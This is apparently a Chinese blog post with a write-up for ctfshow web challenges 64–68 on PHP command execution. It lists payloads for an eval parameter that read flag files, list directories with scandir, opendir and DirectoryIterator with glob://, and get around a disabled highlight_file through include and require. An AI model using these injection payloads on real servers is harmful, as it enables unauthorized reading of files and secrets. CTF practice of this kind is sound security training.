ctfshow命令执行 web入门 web64-68

已于 2023-04-08 16:38:15 修改
阅读量203 收藏 1
点赞数
分类专栏: ctfshow通关 文章标签: 前端 php 服务器 网络安全
于 2023-04-08 16:37:58 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62207170/article/details/130019077
版权

1.web64

在这里插入图片描述
payload:

c=show_source('flag.php');
c=highlight_file('flag.php');
c=print_r(scandir(dirname(__FILE__)));#扫描当前目录有什么文件
c=$a=opendir('./');while(($file = readdir($a)) !=false){echo $file." ";} #扫描当前目录有什么文件"
c=print_r(scandir(current(localeconv())));#扫描当前目录有什么文件
c=highlight_file(next(array_reverse(scandir((dirname(__FILE__))))));

2.web65

在这里插入图片描述
payload:

c=show_source('flag.php');
c=highlight_file('flag.php');
c=print_r(scandir(dirname(__FILE__)));#扫描当前目录有什么文件
c=$a=opendir('./');while(($file = readdir($a)) !=false){echo $file." ";} #扫描当前目录有什么文件"
c=print_r(scandir(current(localeconv())));#扫描当前目录有什么文件
c=highlight_file(next(array_reverse(scandir((dirname(__FILE__))))));

3.web66

在这里插入图片描述
在这里插入图片描述
通过这里发现flag不flag.php里,需要进行扫描目录下的文件

c=print_r(scandir('/'));#扫描根目录有什么文件
c=$a=opendir('/');while(($file = readdir($a)) !=false){echo $file." ";} 
c=highlight_file('/flag.txt');
#文件包含,因为没有可执行的代码,所以可以直接读取文件内容
c=include('/flag.txt');
c=require('/flag.txt');
c=include_once('/flag.txt');
c=require_once('/flag.txt');

4.web67

在这里插入图片描述
通过这里发现flag不flag.php里,需要进行扫描目录下的文件
payload:

c=highlight_file('/flag.txt');
c=print_r(scandir('/'));#扫描根目录有什么文件
c=$a=opendir('/');while(($file = readdir($a)) !=false){echo $file." ";} 
#文件包含,因为没有可执行的代码,所以可以直接读取文件内容
c=include('/flag.txt');
c=require('/flag.txt');
c=include_once('/flag.txt');
c=require_once('/flag.txt');

5.web68

在这里插入图片描述
在这里插入图片描述
可以看到highlight_file函数被禁用了,由上题的可知源码,还是传入c参数执行c
__toString是一种魔术方法,用于一个类被当成字符串时应怎样回应,比如输出对象时
在这里插入图片描述
glob:// 查找匹配的文件路径模式,glob:///'查找根目录下的所有文件及文件夹,glob://.php查找当前目录下后缀是php的文件
DirectoryIterator是php的一个标准类,用于文件遍历,参数是文件路径
在这里插入图片描述

payload:

c=var_dump(scandir('/'));#扫描根目录有什么文件
c=$a=new DirectoryIterator('glob:///*');foreach($a as $f){echo($f->__toString()." ");}  #扫描根目录有什么文件
c=$a=new DirectoryIterator('glob:///*');foreach($a as $f){echo($f->getFilename()." ");} 
c=$a=opendir('/');while(($file = readdir($a)) !=false){echo $file." ";}    #扫描根目录有什么文件
#文件包含,因为没有可执行的代码,所以可以直接读取文件内容
c=include('/flag.txt');
c=require('/flag.txt');
c=include_once('/flag.txt');
c=require_once('/flag.txt');

ctfshow命令执行

mushangqiujin
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CTFshow 命令执行 web68
Kradress的博客
12-04 325
目录源码思路题解总结 源码 Warning: highlight_file() has been disabled for security reasons in /var/www/html/index.php on line 19 思路 根据提示,源码中可能存在highlight_file()函数,然后在php.ini中禁用了highlight_file().源码应该还是上题的. include和require能执行文件中的代码,因为flag不是php代码,所以只能以文本的形式显示 题解 发现
CTFshow-菜狗杯-WEB-变量循环取值-我的眼里只有$
03-04
CTFshow-菜狗杯-WEB-变量循环取值-我的眼里只有$
Web】CTFSHOW PHP命令执行刷题记录(全)
uuzeray的博客
01-10 1060
期末复习不了一点,不如做点旧题醒一醒手感。每一题都尽量用不同payload,如果相同会合并。
CTFSHOW php命令执行
m0_64180167的博客
08-11 708
这里能发现是匹配flag 但是存在高亮 高亮有需要路径同时存在eval 命令执行所以我们传入命令但是过滤了flag我们看看怎么绕过发现了 flag我们绕过正则匹配flag字符串。
ctfshow学习记录-web入门命令执行59-68
龟速更新的九某人
06-13 330
ctfshow学习记录-web入门命令执行web59-68
ctfshow-web命令执行(web61-77;118-124)(Updating)
m0_50268414的博客
11-30 2699
ctfshow-web命令执行(web61-77;118-124) 文章目录ctfshow-web命令执行(web61-77;118-124)web66 print\_r(scandir())与highlight\_file()web68 includeweb69 exit() web66 print_r(scandir())与highlight_file() 题目描述 show_source('flag.php'); 该语句被过滤 题解 POST传入c=print_r(scandir(’/’)); 获得
CTFshow web入门 web56~web70 命令执行
qq_56815564的博客
04-18 583
这回倒好,直接告诉你不能用highlight_file()了,根据上面一堆题目的源码,可以明确的一点就是else里的那个highlight_file()被禁用的原因才导致的报错,即不能使用highlight_file()事先说明一下,eval函数的作用是获取返回值,所以传入导eval中的数据需要是一个有返回值的函数,要不就是一段小程序也行。再次发现根目录下的,flag.txt,直接进得到。
ctfshow web入门命令执行
uuzfumo的博客
12-17 1063
命令执行姿势
ctfshow-VIP题目-Web-详细解题思路
01-27
CTFSHOW-VIP题目-Web-详细解题思路 本文档总结了CTFSHOW-VIP题目-Web的详细解题思路,涵盖了多个Web安全领域的知识点,包括WP源码泄露、协议头信息泄露、robots后台泄露、phps源码泄露、源码压缩包泄露、版本控制...
ctfshow web139命令盲注脚本
10-21
ctfshow靶场 web入门 web139 命令盲注脚本
ctfshow-web41~60-WP
02-21
ctfshow-web41~60-WPctfshow-web41~60-WP
ctfshow web223-group盲注无数字
10-21
ctfshow web223-group盲注无数字
无参数读文件和RCE
..
01-08 577
题目背景:长安战疫杯的RCE_No_Para 代码解析: preg_replace('/[^\W]+\((?R)?\)/', '', $_GET['code']) preg_replace是执行正则搜索,如果搜索到则替换为空。 \W是匹配非数字、字母、下划线,[^\W]则是非\W的东西,即数字、字母、下划线,相当于小写的\w。 正则表达式 – 元字符 | 菜鸟教程 然后难点是(?R)?,意思为递归整个匹配模式。 举个例子: a() #递归零次 a...
CTFshow web(php命令执行 68-71)
csjjjd的博客
02-13 1221
直接输出根目录的位置,然后查看源代码,发现flag位置为flag.txt。还是那句话,没看到flag在哪,那就优先找到flag位置。知道flag在根目录下面的flag.txt直接访问就好了。这里c=var_dump(scandir("/"));先把上题payload看看能不能白嫖啊。// 你们在炫技吗?
CTFshow-命令执行
weixin_44770698的博客
06-25 2651
ctfshow-web 命令执行
Ctfshow web入门 命令执行RCE篇 web29-web77 与 web118-web124 详细题解 全
Jay17的博客
08-16 2984
Ctfshow web入门 命令执行RCE篇 web29-web77 与 web118-web124 详细题解 全
CTFshow web入门——文件包含
小元砸的博客
02-07 3302
Web 78 <?php if(isset($_GET['file'])){ $file = $_GET['file']; include($file); }else{ highlight_file(__FILE__); } 一.分析代码: 使用 include进行了文件包含 二.解题过程: 构造playload: ?file=php://filter/read=convert.base64-encode/resource=flag.php Web 79 <?p
CTFShow-WEB入门篇--信息搜集详细Wp
Aluxian_的博客
06-02 2152
CTFShow-WEB入门篇--信息搜集详细Wp
JS中一个dom元素能绑定多少事件
最新发布
ggq53219的博客
06-10 577
在JavaScript中,一个DOM元素可以绑定的事件数量并没有明确的限制,这主要取决于浏览器的实现和内存限制。然而,在实际应用中,为同一个DOM元素绑定过多的事件监听器可能会导致性能问题,尤其是在事件处理函数执行复杂操作的情况下。总之,虽然JavaScript中DOM元素可以绑定的事件数量没有明确的限制,但在实际应用中应注意避免过度绑定和优化事件处理函数,以确保良好的性能和用户体验。
ctfshow web入门命令执行
09-05
在CTF中,web入门命令执行指的是通过Web应用程序的漏洞,将恶意的命令注入到应用程序中并执行。这样的攻击可以导致未经授权的访问和操纵应用程序的数据和功能。 根据引用中提供的信息,可以看到一些常见的双写绕过...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值